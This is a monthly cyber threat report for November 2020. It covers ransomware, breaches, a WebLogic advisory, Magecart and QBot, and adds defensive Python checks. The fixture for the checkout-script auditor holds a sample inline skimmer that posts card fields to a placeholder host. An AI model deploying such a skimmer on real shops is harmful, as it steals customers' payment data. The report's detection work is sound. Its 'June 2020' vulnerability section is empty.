InForce Cyber

Threat Report November 2020

November was rich in ransomware attacks. The items below illustrate that, together with the other notable incidents and advisories of the month:

Reuters: Suspected North Korean hackers targeted COVID vaccine maker AstraZeneca

The North Korean hackers posed as recruiters on the networking site LinkedIn and on WhatsApp in order to approach AstraZeneca staff, including those working on coronavirus research, with fake job offers.

NHS Error Exposes Data on Hundreds of Patients and Staff

Human error at NHS Highland earlier this month led to the personal information of 284 patients with diabetes being shared via email with 31 individuals, according to local reports.

Canon confirms August ransomware attack and theft of data

Canon has finally confirmed that it was the victim of a ransomware attack in early August and that the threat actors also stole data from its servers.

In August, BleepingComputer first revealed the ransomware attack after it had obtained an internal memo confirming that the outage Canon suffered a few days earlier was caused by ransomware.

The memo also reveals that the company hired an external security firm to investigate the incident.

Ritzau news agency hit by cyber attack

Denmark’s biggest news agency that delivers text and photos to Danish media has been knocked offline following a hacking attack.

"Ritzau has been the target of a hacker attack early this morning. It appears to be a professional attack," the news agency's CEO Lars Vesterloekke said.

"We have now chosen to shut down all our servers because we were unsure how much damage the attack could cause."

Email and telephones were down and news was instead sent out via an emergency email system.

It was unclear who was behind the attack and when the agency would be back online.

Since 1866, Copenhagen-based Ritzau has distributed information and produced news for Danish media, organisations and companies.

Cyber-attacks Reported on Three US Healthcare Providers

Three healthcare providers in Florida, Georgia, and New York are notifying patients that their protected health information may have been exposed in recent cyber-attacks involving ransoms.

Warnings went out to patients of Advanced Urgent Care of the Florida Keys on November 6 regarding a ransomware attack that took place on March 1, 2020.

According to a breach notice issued by the medical center, patient data was compromised when attackers encrypted files on a backup drive. A backup that is reachable from the production network is encrypted along with everything else; at least one copy needs to be offline or otherwise immutable for it to be of any use in recovery.

GoDaddy Employees Used in Attacks on Multiple Cryptocurrency Services

Fraudsters redirected email and web traffic destined for several cryptocurrency trading platforms over the past week. The attacks were facilitated by scams targeting employees at GoDaddy, the world’s largest domain name registrar. The incident is the latest incursion at GoDaddy that relied on tricking employees into transferring ownership and/or control over targeted domains to fraudsters. In March, a voice phishing scam targeting GoDaddy support employees allowed attackers to assume control over at least a half-dozen domain names, including transaction brokering site escrow.com.
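What a defender can do about a registrar-side takeover of this kind is mostly detection and damage limitation: watch the domain's delegation and mail/web records for changes against a known baseline, and keep the registrar's transfer/update/delete locks set so that a social-engineered support agent at least has to clear an extra hurdle. The following is an added example, not GoDaddy's or any registrar's code; the domain, name servers, addresses and the trimmed RDAP document are constructed placeholders. It runs both checks over static data; in production the observed answers would come from a resolver and the RDAP document from the registrar's RDAP service.

```python
"""Detect registrar-level domain hijacking: diff NS/MX/A answers against a
stored baseline and verify the registrar locks are still set. Added example
with constructed data; not GoDaddy's or any registrar's tooling."""
from typing import Dict, List, Tuple

# EPP statuses that block transfer/update/delete until the registrant unlocks
# the domain; RDAP reports them in the 'status' array.
REQUIRED_LOCKS = {
    "clienttransferprohibited",
    "clientupdateprohibited",
    "clientdeleteprohibited",
}

# Record types whose change redirects web (A/AAAA), mail (MX) or everything (NS).
WATCHED_TYPES = ("NS", "MX", "A", "AAAA")


def _norm(value: str) -> str:
    """Lower-case and drop the trailing dot so 'NS1.Example.NET.' == 'ns1.example.net'."""
    return value.strip().lower().rstrip(".")


def _norm_status(status: str) -> str:
    """RDAP writes 'client transfer prohibited'; WHOIS writes 'clientTransferProhibited'."""
    return "".join(ch for ch in status.lower() if ch.isalnum())


def record_changes(baseline: Dict[str, List[str]],
                   observed: Dict[str, List[str]]) -> List[Tuple[str, List[str], List[str]]]:
    """Return (type, expected, observed) for every watched type whose answer set changed."""
    changes = []
    for rtype in WATCHED_TYPES:
        expected = sorted(_norm(v) for v in baseline.get(rtype, []))
        current = sorted(_norm(v) for v in observed.get(rtype, []))
        if expected != current:
            changes.append((rtype, expected, current))
    return changes


def missing_locks(rdap_domain: dict) -> List[str]:
    """Locks that should be on the domain but are absent from its RDAP status list."""
    present = {_norm_status(s) for s in rdap_domain.get("status", [])}
    return sorted(REQUIRED_LOCKS - present)


def assess(domain: str, baseline: Dict[str, List[str]], observed: Dict[str, List[str]],
           rdap_domain: dict) -> Dict[str, object]:
    """Combine both checks into an alert summary for one domain."""
    changes = record_changes(baseline, observed)
    locks = missing_locks(rdap_domain)
    alerts = []
    if any(t == "NS" for t, _, _ in changes):
        alerts.append("delegation changed: treat as full domain takeover")
    if any(t == "MX" for t, _, _ in changes):
        alerts.append("MX changed: inbound mail (and password resets) may be intercepted")
    if any(t in ("A", "AAAA") for t, _, _ in changes):
        alerts.append("web records changed: site traffic may be redirected")
    if locks:
        alerts.append("registrar locks missing: " + ", ".join(locks))
    return {"domain": domain, "changes": changes, "missing_locks": locks, "alerts": alerts}


# --- constructed sample data (placeholder names and addresses) ---------------
DOMAIN = "exchange.example"
BASELINE = {
    "NS": ["ns1.dns-provider.example.", "ns2.dns-provider.example."],
    "MX": ["10 mx.mail-provider.example."],
    "A": ["192.0.2.10"],
}
# What a resolver answers after the registrar account was socially engineered:
# delegation untouched, but mail and web now point at attacker infrastructure.
OBSERVED = {
    "NS": ["ns1.dns-provider.example.", "ns2.dns-provider.example."],
    "MX": ["10 mx.rogue-host.example."],
    "A": ["198.51.100.7"],
}
# Trimmed RDAP domain object as a registrar would return it; only one lock left.
RDAP_DOMAIN = {
    "objectClassName": "domain",
    "ldhName": "exchange.example",
    "status": ["client transfer prohibited", "active"],
}

if __name__ == "__main__":
    for line in assess(DOMAIN, BASELINE, OBSERVED, RDAP_DOMAIN)["alerts"]:
        print("ALERT", line)
```

Run the checks from a host outside the domain's own infrastructure, since a compromised delegation can answer its own monitoring queries with whatever the attacker likes.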

DoppelPaymer ransomware targets ‘Big Brother’ producer Endemol Shine

Endemol Shine, the global production company behind television shows such as “Big Brother,” “MasterChef” and “The Voice,” has been struck by a DoppelPaymer ransomware attack, and sensitive information was stolen.

The attack was confirmed Nov. 26 by Banijay SAS, the parent company of Endemol Shine, which described the attack as a cybersecurity incident involving both Endemol Shine Group and Endemol Shine International networks. The company said it has reason to believe that “certain personal data of current and ex-employees may have been compromised, as well as commercially sensitive information.”

Enel Group hit by ransomware again, Netwalker demands $14 million

Multinational energy company Enel Group has been hit by ransomware for the second time this year, this time by Netwalker, which is demanding a $14 million ransom for the decryption key and for not releasing several terabytes of stolen data. Enel is one of the largest players in the European energy sector, with more than 61 million customers in 40 countries. As of August 10 it ranked 87th in the Fortune Global 500, with revenue of almost $90 billion in 2019.

Enel hit with Netwalker Ransomware attack

In early June, Enel’s internal network was attacked by Snake ransomware, also referred to as EKANS, but the attempt was caught before the malware could spread. On October 19, a researcher shared with BleepingComputer a Netwalker ransom note that appeared to come from an attack on Enel Group.

Oracle issues emergency patch for CVE-2020-14750 WebLogic Server flaw

Oracle issued an out-of-band security update for a critical remote code execution (RCE) vulnerability, tracked as CVE-2020-14750, that affects several versions of Oracle WebLogic Server.

Oracle assigned the flaw a CVSS base score of 9.8 out of 10. A 9.8 on an out-of-band release means unauthenticated exploitation over the network; treat it as patch-now, and keep the WebLogic administration console off untrusted networks regardless of patch level.

According to Oracle, the issue was identified with the help of information provided by 20 organizations and security researchers.
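The first thing a practitioner needs for an out-of-band advisory like this is an inventory of which hosts run an affected version. The script below is an added example, not Oracle tooling: it takes version banners as they appear on the console login page or in "java weblogic.version" output and classifies them against the versions named in Oracle's alert for CVE-2020-14750. Because the one-off patch does not change the five-part version string, a listed version is reported as "affected-unless-patched" and the PSU line, when present, is only captured for reference; the patch itself has to be confirmed with "opatch lsinventory". The sample banners are constructed.

```python
"""Inventory check for CVE-2020-14750: classify WebLogic version banners
against the versions Oracle lists as affected. Added example, not Oracle
tooling; the sample banners below are constructed."""
import re
from typing import Dict, Optional

# Versions named as affected in Oracle's Security Alert for CVE-2020-14750.
AFFECTED_VERSIONS = {
    "10.3.6.0.0",
    "12.1.3.0.0",
    "12.2.1.3.0",
    "12.2.1.4.0",
    "14.1.1.0.0",
}

_VERSION_RE = re.compile(r"\b(\d+(?:\.\d+){1,4})\b")
# 'java weblogic.version' prints an extra line per applied PSU, e.g.
# "WLS PATCH SET UPDATE 12.2.1.3.200714"; captured as informational only.
_PSU_RE = re.compile(r"WLS PATCH SET UPDATE (\S+)")


def normalize_version(version: str) -> str:
    """Pad a dotted version to Oracle's five components ('12.2.1.4' -> '12.2.1.4.0')."""
    parts = version.split(".")
    return ".".join((parts + ["0"] * 5)[:5])


def classify_banner(banner: str) -> Dict[str, Optional[str]]:
    """Return version, PSU tag (if any) and a status for one banner.

    A listed version is 'affected-unless-patched' because the one-off patch
    does not bump the version string; confirm with 'opatch lsinventory'.
    """
    if "weblogic" not in banner.lower():
        return {"version": None, "psu": None, "status": "unknown"}
    m = _VERSION_RE.search(banner)
    if not m:
        return {"version": None, "psu": None, "status": "unknown"}
    version = normalize_version(m.group(1))
    psu = _PSU_RE.search(banner)
    status = "affected-unless-patched" if version in AFFECTED_VERSIONS else "not-listed"
    return {"version": version, "psu": psu.group(1) if psu else None, "status": status}


def triage(banners: Dict[str, str]) -> Dict[str, Dict[str, Optional[str]]]:
    """Classify a host -> banner map, worst cases first."""
    order = {"affected-unless-patched": 0, "unknown": 1, "not-listed": 2}
    results = {host: classify_banner(b) for host, b in banners.items()}
    return dict(sorted(results.items(), key=lambda kv: order[kv[1]["status"]]))


# Constructed sample banners: console login page, CLI output, unrelated host.
SAMPLE_BANNERS = {
    "app-01": "WebLogic Server Version: 12.2.1.4.0",
    "app-02": ("WebLogic Server 12.2.1.3.0 Thu Aug 17 13:39:49 PDT 2017 1882952\n"
               "WLS PATCH SET UPDATE 12.2.1.3.200714"),
    "app-03": "WebLogic Server Version: 12.2.1.2.0",
    "web-09": "Server: nginx/1.18.0",
}

if __name__ == "__main__":
    for host, result in triage(SAMPLE_BANNERS).items():
        print(f"{host:8} {result['status']:24} {result['version']} psu={result['psu']}")
```

"not-listed" only means the version is not in Oracle's list for this CVE; a version such as 12.2.1.2.0 is out of support and should be upgraded rather than treated as safe.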

Data Breaches

Over 2800 e-Shops Running Outdated Magento Software Hit by Credit Card Hackers

A wave of cyberattacks against retailers running the Magento 1.x e-commerce platform earlier this September has been attributed to a single group, according to the latest research. “This group has carried out a large number of diverse Magecart attacks that often compromise large numbers of websites at once through supply chain attacks, such as the Adverline incident, or through the use of exploits such as in the September Magento 1 compromises,” RiskIQ said in an analysis published today.

Collectively called Cardbleed, the attacks targeted at least 2,806 online storefronts running Magento 1.x, which reached end-of-life on June 30, 2020 and therefore no longer receives security patches.
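A skimmer of this kind ends up as a script tag, external or inline, on the checkout page, so the cheapest check a shop can run is to compare the page's scripts against a baseline: allowlisted hosts plus Subresource Integrity for anything external, and known hashes for inline code. The following is an added example, not RiskIQ's or Magento's code; the checkout page and hostnames are constructed placeholders. One limitation is stated in the code: scripts served from the shop's own origin, the usual outcome of a server-side compromise, need file-integrity monitoring on the server, which this page-side check cannot replace.

```python
"""Audit the script tags on a checkout page against a baseline: external
scripts must come from allowlisted hosts and carry an SRI hash, inline scripts
must match a known hash. Added example (not RiskIQ's or Magento's code); the
HTML and hostnames below are constructed placeholders."""
import hashlib
from html.parser import HTMLParser
from typing import List, Optional, Set, Tuple
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect (src, integrity) for external scripts and the body of inline ones."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[Tuple[str, Optional[str]]] = []
        self.inline: List[str] = []
        self._in_inline = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf).strip())


def inline_hash(code: str) -> str:
    """SHA-256 of the whitespace-trimmed inline script body."""
    return hashlib.sha256(code.strip().encode("utf-8")).hexdigest()


def audit_scripts(html: str, allowed_hosts: Set[str],
                  known_inline: Set[str]) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs; an empty list means the page matches the baseline."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings: List[Tuple[str, str]] = []
    for src, integrity in p.external:
        host = urlparse(src).hostname
        if host is None:
            # Same-origin file: its content must be checked on the server
            # (file-integrity monitoring), not from the rendered page.
            continue
        if host not in allowed_hosts:
            findings.append(("unexpected-host", src))   # classic injected skimmer
        elif integrity is None:
            findings.append(("missing-sri", src))       # allowed host, but a swapped file would load
    for code in p.inline:
        digest = inline_hash(code)
        if digest not in known_inline:
            findings.append(("unknown-inline", digest[:16]))
    return findings


# --- constructed baseline and sample page ------------------------------------
ALLOWED_HOSTS = {"static.shop.example"}
KNOWN_INLINE = {inline_hash("window.dataLayer = window.dataLayer || [];")}

# Two legitimate scripts and one known inline snippet, then an injected script
# from an unknown host and an inline form-grabber posting card fields out.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://static.shop.example/js/checkout.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://static.shop.example/js/analytics.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>
<script src="https://cdn-assets.example.net/jquery.min.js"></script>
<script>var f=['cc_number','cvv'];document.forms[0].onsubmit=function(){
new Image().src='https://cdn-assets.example.net/i.gif?d='+btoa(JSON.stringify(f))};</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS, KNOWN_INLINE):
        print(f"{kind:16} {detail}")
```

Fetch the page the way a customer's browser would, logged in and with a basket, since skimmers are often served only on the payment step; a Content-Security-Policy with script-src limited to the same allowlist turns the same baseline into enforcement rather than detection.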
 
130k+ extremely NSFW sexual photos, video and audio leaked by ‘private social network’

The CyberNews investigation team recently discovered an unsecured database containing more than 130,000 extremely sensitive, very explicit private photos, videos, and audio recordings. The database appears to belong to a “private social network” that is most likely based in China.

The sexting (sex texting/messaging) industry has certainly boomed in 2020 in response to forced isolation in many regions. As Covid-19 has locked down entire populations, individuals are increasingly looking online for digital intimacy when physical intimacy is forbidden or risky. Since people generally want to feel safe when sending these kinds of explicit communications, it can be seen as a betrayal that a platform would be so loose in its security.

Over 20 Million BigBasket Customers’ Data Exposed on the Dark Web

BigBasket (Innovative Retail Concepts Private Limited) is India’s largest online food and grocery store. It is funded by Alibaba Group, Mirae Asset-Naver Asia Growth Fund and the UK government-owned CDC Group. “Recently BigBasket became victim to a data breach,” reported Cyble, which has indexed the breached information at AmiBreached.com. The Cyble research team found the BigBasket database for sale on a cybercrime market during routine dark-web monitoring, offered for over $40,000.

Luxottica data breach exposes info of LensCrafters and EyeMed patients

A data breach suffered by Luxottica has exposed the personal and health information of patients of LensCrafters, Target Optical, and EyeMed.

Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, the EyeMed vision care plan, and Glasses.com. Its best known brands are Ray-Ban, Persol, and Oakley. Luxottica also makes sunglasses and prescription frames for designer brands such as Chanel, Prada, Giorgio Armani, Burberry, Versace, Dolce and Gabbana, Miu Miu, and Tory Burch. The Italian company employs over 80,000 people and generated 9.4 billion in revenue for 2019.

Luxottica was hit by a ransomware attack that took place on September 18. In October, the Italian website “Difesa e Sicurezza” reported that the Nefilim ransomware operators had posted a long list of files that appear to belong to Luxottica. The huge trove of files appears to be related to the personnel office and finance departments.

QBot Using Election Interference Baits in Phishing Campaigns

Following the trend of exploiting major world events, a new spam campaign has been observed delivering malicious attachments that exploit concerns and curiosity about the 2020 U.S. election process.

QBot causing interference

Recently, the Malwarebytes Labs Threat Intelligence Team spotted a campaign with U.S. election-themed phishing emails, leveraging a new template. In this campaign, threat actors used hijacked email threads to push bogus DocuSign documents, luring potential victims into opening the bait documents and enabling the macros that drop the malware payload. QBot operators use this tactic to add legitimacy to the scam and earn the victim’s trust. The malware not only infects the victim’s computer but also starts collecting emails that can be used in the next malspam campaigns.

Recent QBot attacks

In October, QBot was seen using Windows Defender Antivirus phishing bait to infect target computers. In several instances, Emotet was seen dropping QBot as a first-stage or second-stage payload. In August, QBot’s malspam campaigns were spreading globally, infecting targets to steal emails from users’ Outlook clients for future exploitation.
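Whatever the theme of the lure, the deliverable in this campaign is an Office document that needs macros enabled, so a mail-gateway check for macro-capable attachments catches it independently of the DocuSign or election wording. The following is an added example, not Malwarebytes' or any product's code: it flags macro-enabled extensions, OOXML containers that contain a vbaProject.bin part even when the file is renamed to .doc, and legacy OLE files that need a deeper look. The message it scans is constructed in code, not a real QBot sample.

```python
"""Flag e-mail attachments that can carry VBA macros: macro-enabled
extensions, OOXML containers holding vbaProject.bin (even when renamed
.doc), and legacy OLE documents. Added example, not Malwarebytes' or any
product's code; the message is constructed here, not a real QBot sample."""
import email
import io
import os
import zipfile
from email import policy
from email.message import EmailMessage
from typing import List, Tuple

MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}
ZIP_MAGIC = b"PK\x03\x04"                              # OOXML (.docx/.docm/...) is a zip
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"       # legacy .doc/.xls compound file


def reasons_for(filename: str, data: bytes) -> List[str]:
    """Why this attachment deserves a macro-capable verdict (empty list if it does not)."""
    reasons = []
    if os.path.splitext(filename.lower())[1] in MACRO_EXTENSIONS:
        reasons.append("macro-enabled extension")
    if data.startswith(ZIP_MAGIC):
        # Look at the content, not the name: a .docm renamed to .doc still
        # carries its VBA project under word/vbaProject.bin.
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                if any(n.lower().endswith("vbaproject.bin") for n in z.namelist()):
                    reasons.append("vbaProject.bin inside OOXML container")
        except zipfile.BadZipFile:
            reasons.append("zip magic but unreadable archive")
    elif data.startswith(OLE_MAGIC):
        reasons.append("legacy OLE document: may embed a VBA project, inspect with oletools")
    return reasons


def scan_message(raw: bytes) -> List[Tuple[str, List[str]]]:
    """Return (filename, reasons) for every attachment that can carry macros."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        reasons = reasons_for(name, data)
        if reasons:
            findings.append((name, reasons))
    return findings


def _fake_docx_with_macros() -> bytes:
    """Minimal OOXML-shaped zip that carries a VBA project part (constructed, inert)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\x00" * 32)
    return buf.getvalue()


def build_sample_message() -> bytes:
    """A constructed lure shaped like the campaign above: reply-style subject, three attachments."""
    msg = EmailMessage()
    msg["From"] = "colleague@partner.example"
    msg["To"] = "victim@corp.example"
    msg["Subject"] = "RE: Completed: Please DocuSign the attached"
    msg.set_content("Please see the document attached to our earlier thread.")
    msg.add_attachment(_fake_docx_with_macros(), maintype="application",
                       subtype="vnd.ms-word.document.macroenabled.12",
                       filename="Statement.docm")
    # Same container renamed to look like a plain legacy document.
    msg.add_attachment(_fake_docx_with_macros(), maintype="application",
                       subtype="msword", filename="DocuSign_Doc.doc")
    msg.add_attachment("nothing to see here", filename="notes.txt")
    return bytes(msg)


if __name__ == "__main__":
    for name, why in scan_message(build_sample_message()):
        print(name, "->", "; ".join(why))
```

The OLE branch is deliberately a referral rather than a verdict: legacy binary documents store macros in OLE streams that this check does not parse, so anything matching it goes to a proper parser before delivery.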

Security Threats By Trend

Vulnerability Summary June 2020

The following vulnerabilities were rated “CRITICAL” by Microsoft:

Recommendations

  1. Patch the Microsoft vulnerabilities rated critical and update all other vulnerable services
  2. Only allow traffic to necessary and well-secured ports
  3. Update AV solutions
  4. Phishing training for employees
  5. Regular pentests to identify possible weak points
  6. Encrypt data in transit and at rest

Sources:

Exploit-DB
McAfee
TrendMicro
Symantec
NIST
Google
FireEye